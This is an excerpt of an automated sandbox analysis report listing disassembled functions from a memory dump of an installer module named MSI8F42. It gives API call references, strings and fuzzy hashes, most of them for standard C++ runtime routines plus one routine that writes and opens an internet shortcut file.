                                                                                                                                            • Instruction Fuzzy Hash: E932F331D29F514ED7239638DC62339A28CAFB73D4F15D727F81AB5AA9EB29C4834100
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ababd327e87d22df91d4c621fc2dfb16225bb376556aa8a1761dfcaf93ef7fa7
                                                                                                                                            • Instruction ID: 767777913bb59f874cf6dacc355decbc9bd960c9a8c2227b36e808f60b83d3ee
                                                                                                                                            • Opcode Fuzzy Hash: ababd327e87d22df91d4c621fc2dfb16225bb376556aa8a1761dfcaf93ef7fa7
                                                                                                                                            • Instruction Fuzzy Hash: E2E19F70602A098FCB2ECF68C580AEAB7F1FF4D312F168659D4569B691D730ADC1CB52
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3471368781-0
                                                                                                                                            • Opcode ID: 0cb3201fd3cd48f89452069e6af2a5f2ffa22dd122a9ad50e2f67d98b25392f1
                                                                                                                                            • Instruction ID: d2c2bf281c6011309b243011ecc4dae1e90610140ea6c577db0f64fb13a10734
                                                                                                                                            • Opcode Fuzzy Hash: 0cb3201fd3cd48f89452069e6af2a5f2ffa22dd122a9ad50e2f67d98b25392f1
                                                                                                                                            • Instruction Fuzzy Hash: 7AB106755007119BDB3AAF28EC92BBBB3A8FF44308F15456DE983C6580EA75E981C710
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                            • Instruction ID: ea15547d4376e6fa7b5cd42a0285d89ad4d2508d4e19830693e0019af17e2b98
                                                                                                                                            • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                            • Instruction Fuzzy Hash: 3C517472E00219EFDF19CF99C991AEEBBB5EF88310F598059E815AB201C7349E50CB51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                            • Instruction ID: 6e9efd554a92782676e9fee3cc7d77d575897f70cd382d9908865ae93333d788
                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                            • Instruction Fuzzy Hash: 2B1108B720114243D61EC63EC5B45FBE395EBCE32572E436AD1918BB58D322A9C59A00
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                            • Instruction ID: 7a4f772b803dd70de8e20d8dca8df84c8d9565bb6d79435ada8d12cae649379e
                                                                                                                                            • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                            • Instruction Fuzzy Hash: F7E08C72911238EBCB16DB9CD92498AF3ECFB84B01B15049AF501D7501C270DE00D7D1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                            • Instruction ID: 18a618512c6ead58debc1e5188d366f5ac254a152f5de2192bb80221b535565a
                                                                                                                                            • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                            • Instruction Fuzzy Hash: BBC08C34040E2057CE2B8E10AEB13BA3394B791783F80058CC4130BA46C52EAC83D641

                                                                                                                                            Control-flow Graph

                                                                                                                                            [Figure: control-flow graph beginning at block 310116-31013f; node legend: Executed / Not Executed]
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0031011D
                                                                                                                                            • collate.LIBCPMT ref: 00310126
                                                                                                                                              • Part of subcall function 0030EDF2: __EH_prolog3_GS.LIBCMT ref: 0030EDF9
                                                                                                                                              • Part of subcall function 0030EDF2: __Getcoll.LIBCPMT ref: 0030EE5D
                                                                                                                                            • __Getcoll.LIBCPMT ref: 0031016C
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310180
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310195
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 003101D3
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 003101E6
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031022C
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310260
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031031B
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031032E
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031034B
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310368
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310385
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 003102BD
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • numpunct.LIBCPMT ref: 003103C4
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 003103D4
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310418
                                                                                                                                              • Part of subcall function 002F6330: LocalAlloc.KERNEL32(00000040,?,00300E04,00000020,?,?,002F9942,00000000,7642E7B1,?,?,?,?,003350DD,000000FF), ref: 002F6336
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031042B
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310448
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3717464618-0
                                                                                                                                            • Opcode ID: 9f7269c252549a7e6cb0eb19d30a0d726d454a37c9f9f2a717611ad3f3e023b2
                                                                                                                                            • Instruction ID: bc405e22850873421373abd7aaa36801ffe3997a7fc6d525d3c57c055f6d4c14
                                                                                                                                            • Opcode Fuzzy Hash: 9f7269c252549a7e6cb0eb19d30a0d726d454a37c9f9f2a717611ad3f3e023b2
                                                                                                                                            • Instruction Fuzzy Hash: D0916E719023196BE71A7FB04C46BBFF9A8DF44760F00487DF90AAB281DFB059504BA2

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 002F667E
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 002F66D7
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 002F66E2
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 002F66FE
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F67DB
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F67E7
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,003349E5), ref: 002F682F
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F684A
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,003349E5), ref: 002F6867
                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F6891
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 002F68D8
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 002F692A
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F695C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                            • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                            • API String ID: 2199533872-3004881174
                                                                                                                                            • Opcode ID: fa05b49d35032bb08d14cdc4188296f83653eda6c39dcfb42f5f91000471da72
                                                                                                                                            • Instruction ID: 679218fa66c47d097eed613f639c7ed8090d6553b9902a8d6aab2b9b4b16779c
                                                                                                                                            • Opcode Fuzzy Hash: fa05b49d35032bb08d14cdc4188296f83653eda6c39dcfb42f5f91000471da72
                                                                                                                                            • Instruction Fuzzy Hash: C7B1F27191024DAFEB21DF64CC8ABFEFBA9EF05740F144129E604AB2C1D7715A18CBA1

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0034DD3C,00000FA0,?,?,00312B6A), ref: 00312B98
                                                                                                                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00312B6A), ref: 00312BA3
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00312B6A), ref: 00312BB4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00312BC6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00312BD4
                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00312B6A), ref: 00312BF7
                                                                                                                                            • DeleteCriticalSection.KERNEL32(0034DD3C,00000007,?,?,00312B6A), ref: 00312C13
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00312B6A), ref: 00312C23
                                                                                                                                            Strings
                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00312B9E
                                                                                                                                            • WakeAllConditionVariable, xrefs: 00312BCC
                                                                                                                                            • SleepConditionVariableCS, xrefs: 00312BC0
                                                                                                                                            • kernel32.dll, xrefs: 00312BAF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                            • API String ID: 2565136772-3242537097
                                                                                                                                            • Opcode ID: 0c05cac4e3570526ba670b1fe70bb1669acd83bd77747ecf61d71fc998776535
                                                                                                                                            • Instruction ID: 831f725b2bb014ce189c2ee45e5202603d6dbc72db2f0f7251d782efd57e40fa
                                                                                                                                            • Opcode Fuzzy Hash: 0c05cac4e3570526ba670b1fe70bb1669acd83bd77747ecf61d71fc998776535
                                                                                                                                            • Instruction Fuzzy Hash: E801D4B5E48311ABD7371F79AC88ED73BAC9F4AB40F010820FD04D61A0DE74D8908AA0

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00315DAC
                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00315DCE
                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00315EDD
                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00315FAF
                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00316033
                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0031604E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                            • API String ID: 2123188842-393685449
                                                                                                                                            • Opcode ID: 0b203563ff2b359a35faa90bf1a3bba5a397cbbed2b1fe50874f30f2916be62c
                                                                                                                                            • Instruction ID: 50aed3f674e04d6e5d50f4940bb6be448062a20601ecc0bc50317a428bb919f1
                                                                                                                                            • Opcode Fuzzy Hash: 0b203563ff2b359a35faa90bf1a3bba5a397cbbed2b1fe50874f30f2916be62c
                                                                                                                                            • Instruction Fuzzy Hash: E0B15871800609EFCF1EDFA4D8819EEB7B5FF98310B15405AE8156B212D774DAA2CB91
                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,7642E7B1,?,?,?), ref: 002F42D2
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,7642E7B1,?,?,?), ref: 002F42F3
                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7642E7B1,?,?,?), ref: 002F4326
                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7642E7B1,?,?,?), ref: 002F4337
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4355
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4371
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4399
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F43B5
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F43D3
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F43EF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1711917922-0
                                                                                                                                            • Opcode ID: fb7b516672f2ee61403fcdcf3306061b4407f3d5cbbbff5415f932ddd2cef7b7
                                                                                                                                            • Instruction ID: b9e6cd0d06303437d1750104f6e597203583aedd6fdfb9d2ccb39a07d7d7f6ee
                                                                                                                                            • Opcode Fuzzy Hash: fb7b516672f2ee61403fcdcf3306061b4407f3d5cbbbff5415f932ddd2cef7b7
                                                                                                                                            • Instruction Fuzzy Hash: E5518D70D11619EBDB15DF98C984BEEFBF8BF48754F244269E610BB280C7B45D018BA4
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030BBC4
                                                                                                                                              • Part of subcall function 0030254E: __EH_prolog3.LIBCMT ref: 00302555
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::_Lockit.LIBCPMT ref: 0030255F
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::~_Lockit.LIBCPMT ref: 003025D0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                            • API String ID: 1538362411-2891247106
                                                                                                                                            • Opcode ID: 0ef55e5a46bb1f605d0606ba63371d2e2e26d38ddb001df49dd30bc65dd7da7e
                                                                                                                                            • Instruction ID: e959bda4cedaa1340627cb9409bbc4c24162d5e07ed58e6a43c27f4abf482ee0
                                                                                                                                            • Opcode Fuzzy Hash: 0ef55e5a46bb1f605d0606ba63371d2e2e26d38ddb001df49dd30bc65dd7da7e
                                                                                                                                            • Instruction Fuzzy Hash: B0B1BE7250120AAFDF1BDF68CD79EFEBBA9EB04304F054119FA06A66D1D7318A10DB60
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00310CA4
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92A0
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92C2
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F92EA
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F9422
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                            • API String ID: 1383202999-2891247106
                                                                                                                                            • Opcode ID: 936524fb4544a0e7f731455e4fe91e291ed12fd9be2360cfa2f2f30d0d49bdfc
                                                                                                                                            • Instruction ID: 3520fd7319a253a4a2b0378006e53ba63a4d6c591b3e06fbee608b8f9ceb5f0b
                                                                                                                                            • Opcode Fuzzy Hash: 936524fb4544a0e7f731455e4fe91e291ed12fd9be2360cfa2f2f30d0d49bdfc
                                                                                                                                            • Instruction Fuzzy Hash: ACB1DF7550020AAFCF2FDFA8C956DFE3BA9FB0C304F150419FA06A6691D6719AD1CB60
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030BF85
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8657
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8679
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F86A1
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F880E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                            • API String ID: 1383202999-2891247106
